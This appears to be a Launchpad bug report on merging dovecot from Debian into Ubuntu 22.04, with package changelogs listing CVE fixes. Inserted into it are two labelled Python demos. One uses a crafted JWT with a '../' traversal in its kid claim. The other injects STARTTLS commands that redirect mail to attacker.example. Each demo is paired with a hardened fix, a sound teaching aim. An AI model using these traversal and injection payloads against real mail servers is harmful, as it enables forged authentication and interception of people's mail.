Merge dovecot from Debian unstable for 22.04

Bug #1946855 reported by Bryce Harrington
Affects: dovecot (Ubuntu)
Status: Fix Released
Importance: Undecided
Assigned to: Bryce Harrington

Bug Description

Upstream: 2.3.16
Debian: 1:2.3.16+dfsg1-3
Ubuntu: 1:2.3.13+dfsg1-1ubuntu3

Debian does new releases regularly, so it's likely there will be newer versions available before FF that we can pick up if this merge is done later in the cycle.

### New Debian Changes ###

dovecot (1:2.3.16+dfsg1-3) unstable; urgency=medium

  * [7b858b6] Fix FTBFS on mips(64)el. Stacktrace generation on these
    architectures requires -funwind-tables, as with 32-bit arm.

 -- Noah Meyerhans <email address hidden> Thu, 16 Sep 2021 08:41:27 -0700

dovecot (1:2.3.16+dfsg1-2) unstable; urgency=medium

  [ Christian Göttsche ]
  * [e1e9ece] d/patches: rework backtrace test patch
  * [be404bf] d/patches: add big-endian patch

 -- Noah Meyerhans <email address hidden> Fri, 10 Sep 2021 16:10:50 -0700

dovecot (1:2.3.16+dfsg1-1) unstable; urgency=medium

  [ Christian Göttsche ]
  * [ff4a227] New upstream version 2.3.14+dfsg1
  * [963fa3b] New upstream version 2.3.15+dfsg1 (Closes: #991323, #983510)
  * [5e0c898] d/watch: adjust dversionmangle for dfsg suffix
  * [9ffb0f5] d/patches: update
  * [850e1d6] New upstream version 2.3.16+dfsg1
  * [7140b87] d/patches: rebase patches
  * [fb1b77e] d/rules: enable LTO
  * [ce7055d] d/control: add libsystemd-dev dependency
  * [db93263] d/copyright: drop unused section
  * [aeec1e8] d/rules: update how to set systemdsystemunitdir
  * [ebe9709] d/patches: resolve compiler warnings
  * [19b2bb0] d/changelog: bump to 1:2.3.16+dfsg1-1
  * [58a4078] d/patches: update 32bit warnings patch

  [ Noah Meyerhans ]
  * [f217c2e] Fix indexer crash
  * [b075317] Import upstream patch for indexer crash on client disconnect
  * [36e8740] drop debian/dovecot-core.maintscript

 -- Noah Meyerhans <email address hidden> Thu, 02 Sep 2021 13:22:16 -0700

dovecot (1:2.3.13+dfsg1-2) unstable; urgency=high

  * Import upstream fixes for security issues (Closes: #990566):
    - CVE-2021-29157: Path traversal issue allowing an attacker with
      access to the local filesystem to trick OAuth2 authentication into
      using an HS256 validation key from an attacker-controlled location
    - CVE-2021-33515: Sensitive information could be redirected to an
      attacker-controlled address because of a STARTTLS command injection
      bug in the submission service

 -- Noah Meyerhans <email address hidden> Tue, 20 Jul 2021 08:05:19 -0700
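
Added example (not from the Debian changelog and not Dovecot's source): a Python sketch of the lookup pattern behind the CVE-2021-29157 entry above. A JWT's kid (key identifier) and azp (authorized party) claims arrive before any signature can be checked, so they are attacker-controlled; if they are spliced straight into a filesystem path, a local attacker can point HS256 validation at a key file they wrote and then mint their own tokens. The on-disk layout <keys_dir>/<azp>/<alg>/<kid>, the KEYS_DIR constant, the escaping scheme and the token contents are assumptions made for this demo, not a description of Dovecot's storage format.

```python
"""Key lookup by untrusted JWT claims: the path-traversal class of CVE-2021-29157.

Constructed example, not Dovecot's code. The layout <keys_dir>/<azp>/<alg>/<kid>
and the KEYS_DIR value are assumptions for illustration.
"""
import base64
import json
import os
import string

KEYS_DIR = "/etc/dovecot/oauth2-keys"   # hypothetical key store root (assumption)
SAFE_CHARS = frozenset(string.ascii_letters + string.digits + "-_")


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64url(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def make_token(header: dict, payload: dict) -> str:
    """Build a JWT-shaped string for the demo. The signature segment is a
    placeholder: the key needed to verify it has not been located yet."""
    sig = _b64url(b"signature-not-verified-in-this-demo")
    return ".".join([_b64url(json.dumps(header).encode()),
                     _b64url(json.dumps(payload).encode()), sig])


def jwt_claims(token: str):
    """Return (header, payload) without checking the signature. At this stage
    nothing in the token is trustworthy, kid and azp included."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(_unb64url(header_b64)), json.loads(_unb64url(payload_b64))


def key_path_unsafe(keys_dir: str, azp: str, alg: str, kid: str) -> str:
    """Vulnerable: claim values go into the path unescaped, so '..' walks out
    of the key store and an HS256 key the attacker planted gets trusted."""
    return os.path.normpath(os.path.join(keys_dir, azp, alg, kid))


def escape_component(value: str) -> str:
    """Percent-escape every byte outside [A-Za-z0-9_-]. The result cannot
    contain '/', backslash or '.', so it can never name another directory."""
    out = []
    for ch in value:
        if ch in SAFE_CHARS:
            out.append(ch)
        else:
            out.extend("%%%02X" % b for b in ch.encode("utf-8"))
    return "".join(out)


def key_path_safe(keys_dir: str, azp: str, alg: str, kid: str) -> str:
    """Hardened: escape each claim, then independently verify containment."""
    parts = [escape_component(p) for p in (azp, alg, kid)]
    path = os.path.normpath(os.path.join(keys_dir, *parts))
    root = os.path.normpath(keys_dir)
    if os.path.commonpath([root, path]) != root:
        raise ValueError("key path escaped the key store: %r" % path)
    return path


def resolve_key_path(token: str, hardened: bool = True, keys_dir: str = KEYS_DIR) -> str:
    """Locate the validation key for a token using either builder."""
    header, payload = jwt_claims(token)
    build = key_path_safe if hardened else key_path_unsafe
    return build(keys_dir, payload["azp"], header["alg"], header["kid"])


# Constructed attacker token: the kid claim carries a traversal sequence.
EVIL_TOKEN = make_token(
    {"alg": "HS256", "typ": "JWT", "kid": "../../../../../tmp/evil.key"},
    {"azp": "mailclient", "sub": "alice@example.org"},
)

if __name__ == "__main__":
    print("unsafe  :", resolve_key_path(EVIL_TOKEN, hardened=False))
    print("hardened:", resolve_key_path(EVIL_TOKEN, hardened=True))
```

Escaping alone closes the traversal; the commonpath check is defence in depth so that a later change to the layout or to the escaper fails closed instead of open. Running the module shows the unsafe builder landing on /tmp/evil.key while the hardened one stays under the key store.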

dovecot (1:2.3.13+dfsg1-1) unstable; urgency=medium

  [ Christian Göttsche ]
  * [6829237] New upstream version 2.3.13 (Closes: #979363)
    - CVE-2020-24386: IMAP hibernation allows accessing other people's mail
    - CVE-2020-25275: MIME parsing crashes with particular messages

  * [6d25736] Add libzstd-dev to build-dependencies (Closes: #969165)
  * [5956798] Rebase patches
  * [2cb63c3] Bump to standards version 4.5.1 (no further changes)
  * [548bac5] Drop unmatched copyright src/lib-ntlm/* wildcard
  * [6f33f3f] Ignore package-contains-documentation-outside-usr-share-doc
    false-positives
  * [dde9c94] Handle removed configuration file in postinst

  [ Pino Toscano ]
  * [04a60e3] d/{control,rules}: disable apparmor support on !linux archs
    (Closes: #951869)

  [ Helmut Grohne ]
  * [e5f9fcb] d/patches: improve cross-compile support (Closes: #979370)

 -- Noah Meyerhans <email address hidden> Mon, 25 Jan 2021 15:38:17 -0800

dovecot (1:2.3.11.3+dfsg1-2) unstable; urgency=medium

  [ Christian Göttsche ]
  * [44770f6] Add patch for 32bit compiler warnings
  * [053865a] Lintian: remove unused override
  * [4ece2e1] Lintian: add forwarded header to Debian specific patches
  * [67872b7] Lintian: ignore Debian only man page
  * [d30bd7e] Lintian: tag manpage-without-executable got renamed to
    spare-manual-page
  * [3bdf952] Limit libcap-dev build-dependency to linux-any
  * [28f6425] Drop acute accent in man page
  * [8c15850] Add patch allowing GSSAPI containing NULL

 -- Noah Meyerhans <email address hidden> Wed, 19 Aug 2020 12:06:07 -0700

dovecot (1:2.3.11.3+dfsg1-1) unstable; urgency=high

  * New upstream release fixes security issues (Closes: #968302)
    - CVE-2020-12100 - Receiving mail with deeply nested MIME parts leads to
      resource exhaustion as Dovecot attempts to parse it.
    - CVE-2020-12673 - Dovecot's NTLM implementation does not correctly check
      message buffer size, which leads to reading past allocation which can
      lead to crash.
    - CVE-2020-12674 - Dovecot's RPA mechanism implementation accepts
      zero-length message, which leads to assert-crash later on.

### Old Ubuntu Delta ###

dovecot (1:2.3.13+dfsg1-1ubuntu3) impish; urgency=medium

  * No-change rebuild due to OpenLDAP soname bump.

 -- Sergio Durigan Junior <email address hidden> Mon, 21 Jun 2021 17:46:46 -0400

dovecot (1:2.3.13+dfsg1-1ubuntu2) impish; urgency=medium

  * SECURITY UPDATE: incorrectly escapes kid and azp fields in JWT tokens
    - debian/patches/CVE-2021-29157.patch: improve escaping in
      src/lib-dict-extra/dict-fs.c, src/lib-oauth2/oauth2-jwt.c,
      src/lib-oauth2/test-oauth2-jwt.c.
    - CVE-2021-29157
  * SECURITY UPDATE: plaintext command injection before STARTTLS
    - debian/patches/CVE-2021-33515.patch: properly handle command queue in
      src/lib-smtp/smtp-server-cmd-starttls.c,
      src/lib-smtp/smtp-server-connection.c.
    - CVE-2021-33515

 -- Marc Deslauriers <email address hidden> Wed, 16 Jun 2021 09:02:15 -0400
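
Added example (not Dovecot's code and not part of the changelog above): a constructed Python model of the input handling that makes "plaintext command injection before STARTTLS" possible, together with the command-queue fix described in the CVE-2021-33515 entry. A man-in-the-middle appends its own commands to the plaintext segment carrying STARTTLS; a server that leaves those bytes in its buffer executes them after the handshake as if the client had sent them over TLS, so the victim's message is addressed to a recipient the attacker chose. Host names, addresses and reply texts are made up for the demo.

```python
"""Plaintext command injection before STARTTLS: the bug class of CVE-2021-33515.

Constructed model of a submission server's input handling, not Dovecot's code.
Reply texts, host names and addresses are made up for the demo.
"""


class SubmissionServer:
    def __init__(self, hardened: bool):
        self.hardened = hardened
        self.tls = False        # True once STARTTLS has been honoured
        self.closed = False
        self.inbuf = b""        # plaintext and TLS-decrypted bytes share this buffer
        self.mail_from = None
        self.rcpt_to = []
        self.replies = []
        self.executed = []      # (layer, command) for every command acted on

    def feed(self, data: bytes) -> None:
        """Bytes arriving from the socket, possibly several pipelined lines."""
        if self.closed:
            return
        self.inbuf += data
        while b"\r\n" in self.inbuf and not self.closed:
            line, self.inbuf = self.inbuf.split(b"\r\n", 1)
            self._dispatch(line.decode("ascii", "replace").strip())

    def _dispatch(self, cmd: str) -> None:
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb == "STARTTLS":
            self.executed.append(("plain", cmd))
            if self.hardened and self.inbuf:
                # Anything already buffered arrived unprotected and may have
                # been appended by a man-in-the-middle. RFC 3207 requires the
                # server to discard pre-handshake client state, so drop the
                # bytes and close rather than replay them inside the TLS session.
                self.inbuf = b""
                self.closed = True
                self.replies.append("554 5.5.1 Data after STARTTLS; closing connection")
                return
            self.replies.append("220 2.0.0 Begin TLS negotiation now")
            self.tls = True     # the TLS handshake would run here
            return              # vulnerable path: self.inbuf survives the handshake
        self.executed.append(("tls" if self.tls else "plain", cmd))
        if verb == "MAIL":
            if self.mail_from is not None:
                self.replies.append("503 5.5.1 MAIL already given")
                return
            self.mail_from = arg.split(":", 1)[1]
            self.replies.append("250 2.1.0 OK")
        elif verb == "RCPT":
            self.rcpt_to.append(arg.split(":", 1)[1])
            self.replies.append("250 2.1.5 OK")
        elif verb == "RSET":
            self.mail_from, self.rcpt_to = None, []
            self.replies.append("250 2.0.0 OK")
        elif verb == "DATA":
            self.replies.append("354 End data with <CR><LF>.<CR><LF>")
        else:                   # EHLO and friends, simplified to a bare 250
            self.replies.append("250 2.0.0 OK")


def run_scenario(hardened: bool, mitm: bool = True) -> SubmissionServer:
    """Client pipelines EHLO+STARTTLS; a MITM appends envelope commands to that
    plaintext segment; the client then continues over TLS, unaware of them."""
    srv = SubmissionServer(hardened)
    plaintext = b"EHLO laptop.example.org\r\nSTARTTLS\r\n"
    if mitm:
        plaintext += (b"RSET\r\n"
                      b"MAIL FROM:<mitm@attacker.example>\r\n"
                      b"RCPT TO:<drop@attacker.example>\r\n")
    srv.feed(plaintext)
    # Everything from here is what the real client sends after its TLS handshake.
    srv.feed(b"MAIL FROM:<alice@example.org>\r\nRCPT TO:<bob@example.org>\r\nDATA\r\n")
    return srv


if __name__ == "__main__":
    for hardened in (False, True):
        s = run_scenario(hardened)
        print("hardened=%s closed=%s sender=%s recipients=%s"
              % (hardened, s.closed, s.mail_from, s.rcpt_to))
```

In the vulnerable run the injected RSET, MAIL and RCPT are logged as executed over TLS, the victim's own MAIL FROM is refused with 503 because the envelope was already opened by the attacker, and the message goes to both drop@attacker.example and the intended recipient. The hardened branch refuses the connection rather than silently discarding the extra bytes: a client that really pipelined after STARTTLS is misbehaving, and a bounced connection shows up in logs, whereas a quietly emptied buffer would hide an attack in progress.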

dovecot (1:2.3.13+dfsg1-1ubuntu1) hirsute; urgency=medium

  * Package references hidden symbols during an LTO link. This needs further
    investigation. Until then, disable LTO.

 -- Matthias Klose <email address hidden> Tue, 30 Mar 2021 17:23:55 +0200

dovecot (1:2.3.13+dfsg1-1build1) hirsute; urgency=high

  * No change rebuild against clucene-core

 -- Balint Reczey <email address hidden> Thu, 18 Feb 2021 18:19:47 +0100

Tags: needs-merge

Bryce Harrington (bryce)
Changed in dovecot (Ubuntu):
assignee: nobody → Bryce Harrington (bryce)
Bryce Harrington (bryce)
description: updated
Changed in dovecot (Ubuntu):
milestone: none → ubuntu-22.01
Bryce Harrington (bryce)
description: updated
Changed in dovecot (Ubuntu):
status: New → Incomplete
Bryce Harrington (bryce)
Changed in dovecot (Ubuntu):
status: Incomplete → New
status: New → In Progress
Bryce Harrington (bryce)
Changed in dovecot (Ubuntu):
milestone: ubuntu-22.01 → ubuntu-21.11
Bryce Harrington (bryce) wrote :

Uploaded; pending transition.

Changed in dovecot (Ubuntu):
status: In Progress → Fix Committed
Sergio Durigan Junior (sergiodj) wrote :

Note: dovecot-antispam also needs to be rebuilt when updating dovecot:

https://launchpad.net/ubuntu/+source/dovecot-antispam/2.0+20171229-1build9

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package dovecot - 1:2.3.16+dfsg1-3ubuntu1

---------------
dovecot (1:2.3.16+dfsg1-3ubuntu1) jammy; urgency=medium

  [ Bryce Harrington ]
  * Merge with Debian unstable. (LP: #1946855)
    Remaining changes:
    - Package references hidden symbols during an LTO link. This needs further
      investigation. Until then, disable LTO.
  * Dropped:
    - SECURITY UPDATE: incorrectly escapes kid and azp fields in JWT tokens
      + debian/patches/CVE-2021-29157.patch: improve escaping in
        src/lib-dict-extra/dict-fs.c, src/lib-oauth2/oauth2-jwt.c,
        src/lib-oauth2/test-oauth2-jwt.c.
      [Included in Debian 1:2.3.13+dfsg1-2]
    - SECURITY UPDATE: plaintext command injection before STARTTLS
      + debian/patches/CVE-2021-33515.patch: properly handle command queue in
        src/lib-smtp/smtp-server-cmd-starttls.c,
        src/lib-smtp/smtp-server-connection.c.
      [Included in Debian 1:2.3.13+dfsg1-2]
  * d/rules: Disable Debian's recent enablement of LTO as well, as it
    FTBFS when building with gcc 11.
    (LP: #1951325)

  [ Simon Chopin ]
  * d/p/OpenSSL3.patch: Workaround to fix EC key handling when building
    with OpenSSL 3.0.
    (LP: #1945763)

 -- Bryce Harrington <email address hidden> Wed, 17 Nov 2021 13:46:08 -0800

Changed in dovecot (Ubuntu):
status: Fix Committed → Fix Released